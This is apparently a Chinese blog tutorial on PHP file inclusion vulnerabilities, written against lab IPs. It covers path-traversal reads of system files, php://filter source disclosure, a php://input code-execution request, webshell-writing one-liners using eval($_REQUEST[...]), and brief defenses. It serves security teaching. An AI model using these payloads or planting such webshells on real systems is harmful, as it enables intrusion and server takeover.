文件包含漏洞解析

最新推荐文章于 2024-07-15 13:13:49 发布
最新推荐文章于 2024-07-15 13:13:49 发布
阅读量40 收藏
点赞数
文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lay77/article/details/132641691
版权

目录

1.文件包含概述

1.漏洞原理:

2.文件包含语句:

3.文件包含类型:

4.漏洞特点:

2.文件包含攻击方法

1.读取敏感文件

2.读取PHP 文件源码

3.执行PHP 命令

4.包含图片马写Shell

5.包含日志

3.文件包含防御方法:

1.文件包含概述

1.漏洞原理:

程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成文件包含漏洞。 几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在PHP 的Web 应用中居多,在JSP/ASP/ASP.NET 程序中比较少。 1.1 文件包含语句 PHP 提供了四个文件包含的语句,四个语句之间略有不同。

2.文件包含语句:
PHP:include() 、include_once()、require()、require_once() 
JSP/Servlet:ava.io.file()、java.io.filereader() 
​​​​​​​ASP:include file、include virtual

PHP 提供了四个文件包含的语句。

语句区别
include()多次包含,多次执行; 如果包含失败,脚本产生警告,继续运行。
include_once()多次包含,一次执行; 如果包含失败,脚本产生警告,继续运行。
require()多次包含,多次执行; 如果包含失败,脚本产生错误,结束执行。
require_once()多次包含,一次执行; 如果包含失败,脚本产生错误,结束执行。

相关配置:

文件包含是PHP 的基本功能之一,有本地文件包含与远程文件包含之分。简单来说,本地文件包含就是可以读取和打开本地文件,远程文件包含就是可以远程(方式)加载文件。可以通过php.ini 中的选项进行配置。

allow_url_fopen = On/Off # 通过远程方式打开文件
allow_url_include = On/Off # 通过远程方式包含文件

3.文件包含类型:

  • 本地文件包含

通过本地路径访问到的文件。

?filepath=../phpinfo.php

  • 远程文件包含

通过远程路径访问到的文件。

?filepath=http://10.9.64.180/phpinfo.jpg

4.漏洞特点:

无视文件扩展名读取文件内容。

?filepath=./a.jpg

无条件解析PHP 代码,为图片木马提供了出路。

?filepath=a_yjh_info.jpg

2.文件包含攻击方法

1.读取敏感文件

利用文件包含漏洞,也可以读取敏感文件。

前提条件:

  • 目标文件存在(已知目标文件路径)

  • 具有文件可读权限

  • 具体方法:

# 相对路径
?filepath=../../../../../../windows/system32/drivers/etc/hosts
# 绝对路径
?filepath=c:/windows/system32/drivers/etc/hosts
# 使用php 封装协议
?filepath=file://c:/windows/system32/drivers/etc/hosts
2.读取PHP 文件源码

利用php://fileter 读取。

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

读取结果:

PD9waHANCi8vIGZpbGUtaW5jbHVkZS5waHANCg0KJGZwID0gQCRfR0VUWydmaWxlcGF0aCddOw0KQGluY2x1ZGUgJGZwOw==
3.执行PHP 命令

利用条件:

  • 利用php://input 执行PHP 命令

  • 远程文件包含开启

POST /file-include/include.php?filepath=php://input HTTP/1.1
Host: 192.168.111.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=q9lc0vlnggvo7kogh6j01a3582
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 18
<?php phpinfo();?>
4.包含图片马写Shell

条件:

  • 确定文件包含漏洞存在

  • 菜刀不能直接连接

写Shell:

<?php fputs(fopen("shell.php",'w'),'<?=@eval($_REQUEST[777]);phpinfo();?>')?>
<?php file_put_contents('shell.php','<?php @eval($_REQUEST[777])?>')?>

利用:

http://10.4.7.130/file-include/shell.php
5.包含日志

3.文件包含防御方法:

  • 尽量少的使用动态包含;

  • 严格过滤被包含文件的路径;

  • 将参数allow_url_include 设置为Off;

  • 使用参数open_basedir 限定文件访问范围。

open_basedir = c:\phpstudy_2016\www\

lay77.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【网络安全】文件包含漏洞解析
你在看屏幕的同时,屏幕也在注视着你
08-14 4593
文件包含漏洞解析
web安全文件上传、文件包含漏洞解析
vivlol918的博客
05-14 1185
文件上传漏洞是指攻击者通过页面上传图片、文件等途径,将恶意脚本等文件上传到服务器上,从而控制服务器,实现攻击目的。
解析漏洞文件包含漏洞
hk41666的博客
07-10 718
关于解析漏洞文件包含漏洞如何帮助文件上传漏洞
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
Tomcat AJP文件包含漏洞解析
yongshou614423的博客
02-29 3240
漏洞背景 安全公告编号:CNTA-2020-0004 漏洞内容:攻击者可利用该高危漏洞读取或包含Tomcat上所有 webapp目录下的任意文件,如:webapp配置文件或源代码等。 受影响的版本包括:Tomcat 6,Tomcat 7的7.0.100以下版本,Tomcat 8的8.5.51以下版本,Tomcat 9的9.0.31以下版本。 漏洞综合评级:“高危”。 详细内容:https:...
文件包含漏洞——实例
weixin_54055099的博客
09-24 2967
文件包含漏洞的实例
文件包含漏洞
只有不断学习才不会被茫茫人海淹没!
05-06 4414
这里写目录标题理论漏洞产生原因利用方式防御绕过方式php伪协议实战 理论 漏洞产生原因 1、include出现错误时,不会影响php代码的执行,require会中断php代码的执行 2、include有返回值,require没有返回值; 3、include可以包含多次,include_once只包含一次,后者一样。 利用方式 防御 绕过方式 php伪协议实战 ......
dvwa文件包含漏洞
lusandong的博客
04-03 854
dvwa,文件包含
文件包含漏洞(详解)
qq_38348692的博客
09-13 4714
1. 文件包含:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,例如 include “conn.php”。php常见的文件包含函数: include "conn.php": 当包含文件出现错误时,发出错误信息,继续执行 include_once "conn.php":只包含一次 require "conn.php": 当包含出现错误时,发出错误信息,不再...
文件包含漏洞实战
yuan_boss的博客
08-31 1304
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
文件包含原理解释-require
05-13
不恰当的文件包含可能导致远程文件包含漏洞(RFI,Remote File Inclusion),攻击者可以通过构造恶意URL来包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含文件路径是可信的,并避免用户...
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞的危害性非常高,攻击者可以通过上传恶意文件到目标服务器,例如上传一个名为"1.php.xxxx"的文件,其中包含恶意代码,Apache服务器会错误地解析文件为PHP文件,从而导致恶意代码的执行。...
模块B-3系统漏洞解析.pdf
11-21
【模块B-3系统漏洞解析】涉及的是网络安全领域中的渗透测试技术,主要目的是评估和分析系统安全性,查找潜在的漏洞并进行修复。以下是对每个步骤的详细解释: 1. **查看靶机共享目录及IP白名单**:在渗透测试中,...
解析漏洞源码
02-28
这种漏洞通常是由于服务器或应用程序在处理文件上传时,对文件类型或内容的解析方式存在缺陷,导致攻击者能够绕过安全防护,上传恶意代码或者执行未授权的操作。本文将深入解析"解析漏洞源码",帮助你理解其工作原理...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 396
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
网络安全-基础网络概念1
LS_Ai的博客
07-11 550
计算机网络是一种将多个计算机系统和设备连接在一起的技术,目的是为了共享资源和信息。网络使得设备之间可以进行数据传输和通信,常见的网络包括局域网(LAN)、广域网(WAN)和城域网(MAN)。
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
最新发布
等风来
07-15 70
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 282
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
000 解题核心思路.docx
06-30
另一种常见的漏洞文件包含漏洞。这种漏洞允许攻击者通过导入和执行外部文件来获取服务器的控制权。在这种攻击中,攻击者通常会通过将文件名作为参数传递给包含函数来执行攻击。例如,在"file="参数中,攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值